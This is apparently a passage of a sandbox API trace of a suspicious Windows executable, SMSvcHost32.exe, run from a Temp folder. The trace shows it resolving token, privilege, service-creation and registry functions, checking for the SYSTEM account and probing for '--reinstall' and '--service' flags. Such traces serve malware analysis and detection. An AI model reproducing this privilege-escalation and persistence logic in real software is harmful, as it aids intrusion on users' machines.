	[0064.887] GetProcAddress (hModule=0x765a0000, lpProcName="FindFirstFileW") returned 0x765c6960
	[0064.887] GetProcAddress (hModule=0x765a0000, lpProcName="FindNextFileW") returned 0x765c69a0
	[0064.887] VirtualProtect (in: lpAddress=0x4230c8, dwSize=0x198, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0064.887] GetModuleHandleA (lpModuleName="USER32.dll") returned 0x77810000
	[0064.887] VirtualProtect (in: lpAddress=0x4232b8, dwSize=0x20, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0064.887] GetProcAddress (hModule=0x77810000, lpProcName="wsprintfW") returned 0x7783f890
	[0064.887] GetProcAddress (hModule=0x77810000, lpProcName="wsprintfA") returned 0x778404a0
	[0064.887] GetProcAddress (hModule=0x77810000, lpProcName="ExitWindowsEx") returned 0x77879430
	[0064.888] GetProcAddress (hModule=0x77810000, lpProcName="GetShellWindow") returned 0x7782ff50
	[0064.888] GetProcAddress (hModule=0x77810000, lpProcName="GetForegroundWindow") returned 0x77848cb0
	[0064.888] GetProcAddress (hModule=0x77810000, lpProcName="TranslateMessage") returned 0x7782d9b0
	[0064.888] GetProcAddress (hModule=0x77810000, lpProcName="GetWindowThreadProcessId") returned 0x7782da50
	[0064.888] VirtualProtect (in: lpAddress=0x4232b8, dwSize=0x20, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0064.888] GetModuleHandleA (lpModuleName="ADVAPI32.dll") returned 0x74aa0000
	[0064.888] VirtualProtect (in: lpAddress=0x423000, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0064.888] GetProcAddress (hModule=0x74aa0000, lpProcName="GetUserNameA") returned 0x74ac2910
	[0064.888] GetProcAddress (hModule=0x74aa0000, lpProcName="LookupAccountSidW") returned 0x74abf590
	[0064.895] GetProcAddress (hModule=0x74aa0000, lpProcName="DuplicateTokenEx") returned 0x74ac0ad0
	[0064.895] GetProcAddress (hModule=0x74aa0000, lpProcName="GetLengthSid") returned 0x74abf570
	[0064.895] GetProcAddress (hModule=0x74aa0000, lpProcName="CreateProcessAsUserW") returned 0x74ac2c10
	[0064.895] GetProcAddress (hModule=0x74aa0000, lpProcName="FreeSid") returned 0x74ac0440
	[0064.895] GetProcAddress (hModule=0x74aa0000, lpProcName="OpenProcessToken") returned 0x74abf520
	[0064.895] GetProcAddress (hModule=0x74aa0000, lpProcName="RegSetValueExA") returned 0x74ac0a20
	[0064.895] GetProcAddress (hModule=0x74aa0000, lpProcName="AllocateAndInitializeSid") returned 0x74abf660
	[0064.895] GetProcAddress (hModule=0x74aa0000, lpProcName="SetTokenInformation") returned 0x74ac3840
	[0064.896] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyA") returned 0x74ac09d0
	[0064.896] GetProcAddress (hModule=0x74aa0000, lpProcName="RegCloseKey") returned 0x74abf620
	[0064.896] GetProcAddress (hModule=0x74aa0000, lpProcName="ConvertSidToStringSidW") returned 0x74abf060
	[0064.896] GetProcAddress (hModule=0x74aa0000, lpProcName="LookupPrivilegeValueA") returned 0x74ad4dc0
	[0064.896] GetProcAddress (hModule=0x74aa0000, lpProcName="AdjustTokenPrivileges") returned 0x74ac0980
	[0064.896] GetProcAddress (hModule=0x74aa0000, lpProcName="RegQueryValueExW") returned 0x74abf330
	[0064.896] GetProcAddress (hModule=0x74aa0000, lpProcName="RegDeleteValueW") returned 0x74ac0fb0
	[0064.896] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyExW") returned 0x74abf350
	[0064.896] GetProcAddress (hModule=0x74aa0000, lpProcName="InitializeAcl") returned 0x74abfa80
	[0064.896] GetProcAddress (hModule=0x74aa0000, lpProcName="InitializeSecurityDescriptor") returned 0x74abfc00
	[0064.896] GetProcAddress (hModule=0x74aa0000, lpProcName="AddAce") returned 0x74ac1ee0
	[0064.897] GetProcAddress (hModule=0x74aa0000, lpProcName="RegSetValueExW") returned 0x74abf7f0
	[0064.897] GetProcAddress (hModule=0x74aa0000, lpProcName="RegSetKeySecurity") returned 0x74ad7830
	[0064.897] GetProcAddress (hModule=0x74aa0000, lpProcName="RegCreateKeyExW") returned 0x74abfa20
	[0064.897] GetProcAddress (hModule=0x74aa0000, lpProcName="GetAce") returned 0x74ac2550
	[0064.897] GetProcAddress (hModule=0x74aa0000, lpProcName="GetAclInformation") returned 0x74ac2570
	[0064.897] GetProcAddress (hModule=0x74aa0000, lpProcName="RegGetKeySecurity") returned 0x74ac4190
	[0064.897] GetProcAddress (hModule=0x74aa0000, lpProcName="GetSecurityDescriptorDacl") returned 0x74abfc50
	[0064.897] GetProcAddress (hModule=0x74aa0000, lpProcName="SetSecurityDescriptorDacl") returned 0x74abf830
	[0064.897] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyExA") returned 0x74abf790
	[0064.897] GetProcAddress (hModule=0x74aa0000, lpProcName="CheckTokenMembership") returned 0x74abfb50
	[0064.897] GetProcAddress (hModule=0x74aa0000, lpProcName="CreateWellKnownSid") returned 0x74ac0af0
	[0064.898] GetProcAddress (hModule=0x74aa0000, lpProcName="GetSidSubAuthority") returned 0x74ac0ab0
	[0064.898] GetProcAddress (hModule=0x74aa0000, lpProcName="GetSidSubAuthorityCount") returned 0x74ac0eb0
	[0064.898] GetProcAddress (hModule=0x74aa0000, lpProcName="RegQueryValueExA") returned 0x74abf500
	[0064.898] GetProcAddress (hModule=0x74aa0000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorA") returned 0x74ac3ba0
	[0064.898] GetProcAddress (hModule=0x74aa0000, lpProcName="SetEntriesInAclW") returned 0x74ac2bf0
	[0064.898] GetProcAddress (hModule=0x74aa0000, lpProcName="SetFileSecurityW") returned 0x74ac41d0
	[0064.898] GetProcAddress (hModule=0x74aa0000, lpProcName="RegOpenKeyW") returned 0x74abfaa0
	[0064.898] GetProcAddress (hModule=0x74aa0000, lpProcName="GetUserNameW") returned 0x74ac1030
	[0064.898] GetProcAddress (hModule=0x74aa0000, lpProcName="StartServiceW") returned 0x74ac4210
	[0064.898] GetProcAddress (hModule=0x74aa0000, lpProcName="OpenSCManagerW") returned 0x74ac0ed0
	[0064.898] GetProcAddress (hModule=0x74aa0000, lpProcName="CloseServiceHandle") returned 0x74ac0960
	[0064.898] GetProcAddress (hModule=0x74aa0000, lpProcName="CreateServiceW") returned 0x74ad65d0
	[0064.899] GetProcAddress (hModule=0x74aa0000, lpProcName="SetServiceStatus") returned 0x74ac0fd0
	[0064.899] GetProcAddress (hModule=0x74aa0000, lpProcName="RegisterServiceCtrlHandlerW") returned 0x74ac12f0
	[0064.899] GetProcAddress (hModule=0x74aa0000, lpProcName="StartServiceCtrlDispatcherW") returned 0x74ac12b0
	[0064.899] GetProcAddress (hModule=0x74aa0000, lpProcName="RegCreateKeyA") returned 0x74ac2500
	[0064.899] GetProcAddress (hModule=0x74aa0000, lpProcName="GetTokenInformation") returned 0x74abf370
	[0064.899] VirtualProtect (in: lpAddress=0x423000, dwSize=0xc8, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0064.899] GetModuleHandleA (lpModuleName="Secur32.dll") returned 0x0
	[0064.899] LoadLibraryA (lpLibFileName="Secur32.dll") returned 0x6ff60000
	[0064.971] VirtualProtect (in: lpAddress=0x4232b0, dwSize=0x8, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0064.972] GetProcAddress (hModule=0x6ff60000, lpProcName="GetUserNameExW") returned 0x7469c5f0
	[0064.972] VirtualProtect (in: lpAddress=0x4232b0, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0064.972] GetModuleHandleA (lpModuleName="SHELL32.dll") returned 0x0
	[0064.972] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75120000
	[0068.817] VirtualProtect (in: lpAddress=0x423274, dwSize=0x10, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0068.817] GetProcAddress (hModule=0x75120000, lpProcName="ShellExecuteExW") returned 0x752be690
	[0068.818] GetProcAddress (hModule=0x75120000, lpProcName=0x2a8) returned 0x753cdb90
	[0068.819] GetProcAddress (hModule=0x75120000, lpProcName="SHChangeNotify") returned 0x7527cd10
	[0068.819] VirtualProtect (in: lpAddress=0x423274, dwSize=0x10, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0068.819] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x0
	[0068.819] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x771d0000
	[0069.846] VirtualProtect (in: lpAddress=0x42337c, dwSize=0x18, flNewProtect=0x4, lpflOldProtect=0x19fed0 | out: lpflOldProtect=0x19fed0*=0x2) returned 1
	[0069.846] GetProcAddress (hModule=0x771d0000, lpProcName="CoTaskMemFree") returned 0x748d9170
	[0069.846] GetProcAddress (hModule=0x771d0000, lpProcName="CoCreateInstance") returned 0x74900060
	[0069.846] GetProcAddress (hModule=0x771d0000, lpProcName="CoInitialize") returned 0x77201930
	[0069.847] GetProcAddress (hModule=0x771d0000, lpProcName="CoUninitialize") returned 0x748d92a0
	[0069.847] GetProcAddress (hModule=0x771d0000, lpProcName="CoInitializeEx") returned 0x748d88d0
	[0069.847] VirtualProtect (in: lpAddress=0x42337c, dwSize=0x18, flNewProtect=0x2, lpflOldProtect=0x19fed8 | out: lpflOldProtect=0x19fed8*=0x4) returned 1
	[0069.847] VirtualFree (lpAddress=0x650000, dwSize=0x32e00, dwFreeType=0x4000) returned 1
	[0069.848] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
	[0069.848] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x413e60, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac
	[0069.848] CloseHandle (hObject=0x1ac) returned 1
	[0069.848] GetCurrentProcess () returned 0xffffffff
	[0069.848] WaitForSingleObject (hHandle=0xffffffff, dwMilliseconds=0xffffffff) 

Thread:
	id = 44
	os_tid = 0xcbc


Thread:
	id = 46
	os_tid = 0xd54

	[0069.853] GetModuleHandleA (lpModuleName="kernel32") returned 0x765a0000
	[0069.853] GetProcAddress (hModule=0x765a0000, lpProcName="SetErrorMode") returned 0x765b8d20
	[0069.853] SetErrorMode (uMode=0x0) returned 0x0
	[0069.853] SetErrorMode (uMode=0x2) returned 0x0
	[0069.853] GetLastError () returned 0x57
	[0069.853] GetLastError () returned 0x57
	[0069.853] GetLastError () returned 0x57
	[0069.853] GetLastError () returned 0x57
	[0069.853] GetLastError () returned 0x57
	[0069.853] GetLastError () returned 0x57
	[0069.853] GetLastError () returned 0x57
	[0069.853] GetLastError () returned 0x57
	[0069.853] GetLastError () returned 0x57
	[0069.853] GetLastError () returned 0x57
	[0069.853] GetLastError () returned 0x57
	[0069.853] GetLastError () returned 0x57
	[0069.853] GetLastError () returned 0x57
	[0069.853] GetLastError () returned 0x57
	[0069.853] GetLastError () returned 0x57
	[0069.853] GetLastError () returned 0x57
	[0069.853] GetLastError () returned 0x57
	[0069.853] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.854] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.855] GetLastError () returned 0x57
	[0069.856] GetLastError () returned 0x57
	[0069.856] GetLastError () returned 0x57
	[0069.856] GetLastError () returned 0x57
	[0069.856] GetLastError () returned 0x57
	[0069.856] GetLastError () returned 0x57
	[0069.856] GetLastError () returned 0x57
	[0069.856] GetLastError () returned 0x57
	[0069.856] GetLastError () returned 0x57
	[0069.856] GetLastError () returned 0x57
	[0069.856] GetLastError () returned 0x57
	[0069.856] GetLastError () returned 0x57
	[0069.856] GetLastError () returned 0x57
	[0069.856] GetLastError () returned 0x57
	[0069.856] GetLastError () returned 0x57
	[0069.856] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75120000
	[0069.856] GetProcAddress (hModule=0x75120000, lpProcName="CommandLineToArgvW") returned 0x752cbf80
	[0069.856] GetCommandLineW () returned="\"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\" "
	[0069.856] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\" ", pNumArgs=0x202fdec | out: pNumArgs=0x202fdec) returned 0x719768*="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe"
	[0069.856] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72b2b8, nSize=0x104 | out: lpFilename="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe")) returned 0x34
	[0069.856] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
	[0069.856] GetCurrentProcess () returned 0xffffffff
	[0069.857] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x202fdbc | out: TokenHandle=0x202fdbc*=0x1ac) returned 1
	[0069.857] GetTokenInformation (in: TokenHandle=0x1ac, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x202fdc8 | out: TokenInformation=0x0, ReturnLength=0x202fdc8) returned 0
	[0069.857] GetLastError () returned 0x7a
	[0069.857] GetTokenInformation (in: TokenHandle=0x1ac, TokenInformationClass=0x1, TokenInformation=0x7200c0, TokenInformationLength=0x24, ReturnLength=0x202fdc8 | out: TokenInformation=0x7200c0, ReturnLength=0x202fdc8) returned 1
	[0069.857] ConvertSidToStringSidW () returned 0x1
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.857] GetLastError () returned 0x0
	[0069.858] StrCmpIW (psz1="S-1-5-18", psz2="S-1-5-21-2172869166-1497266965-2109836178-1000") returned -1
	[0069.860] LocalFree (hMem=0x720140) returned 0x0
	[0069.860] CloseHandle (hObject=0x1ac) returned 1
	[0069.860] GetLastError () returned 0x0
	[0069.860] GetLastError () returned 0x0
	[0069.860] GetLastError () returned 0x0
	[0069.860] GetLastError () returned 0x0
	[0069.860] GetLastError () returned 0x0
	[0069.860] GetLastError () returned 0x0
	[0069.860] GetLastError () returned 0x0
	[0069.860] GetLastError () returned 0x0
	[0069.860] GetLastError () returned 0x0
	[0069.860] GetLastError () returned 0x0
	[0069.860] GetLastError () returned 0x0
	[0069.860] GetLastError () returned 0x0
	[0069.860] GetLastError () returned 0x0
	[0069.860] GetLastError () returned 0x0
	[0069.860] GetLastError () returned 0x0
	[0069.860] GetLastError () returned 0x0
	[0069.860] GetLastError () returned 0x0
	[0069.860] GetLastError () returned 0x0
	[0069.860] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] StrStrIW (lpFirst="\"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\" ", lpSrch="--reinstall") returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.861] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] StrStrIW (lpFirst="\"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\" ", lpSrch=" --service") returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] StrStrIW (lpFirst="\"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\" ", lpSrch="-test") returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.862] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] GetLastError () returned 0x0
	[0069.863] StrStrIW (lpFirst="\"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\" ", lpSrch=" --vwxyz") returned 0x0
	[0069.863] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x413a40, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac
	[0069.863] CloseHandle (hObject=0x1ac) returned 1
	[0069.863] GetCurrentProcess () returned 0xffffffff
	[0069.863] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x202fd54 | out: TokenHandle=0x202fd54*=0x1ac) returned 1
	[0069.863] GetTokenInformation (in: TokenHandle=0x1ac, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x202fd5c | out: TokenInformation=0x0, ReturnLength=0x202fd5c) returned 0
	[0069.863] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetTokenInformation (in: TokenHandle=0x1ac, TokenInformationClass=0x19, TokenInformation=0x728938, TokenInformationLength=0x14, ReturnLength=0x202fd5c | out: TokenInformation=0x728938, ReturnLength=0x202fd5c) returned 1
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
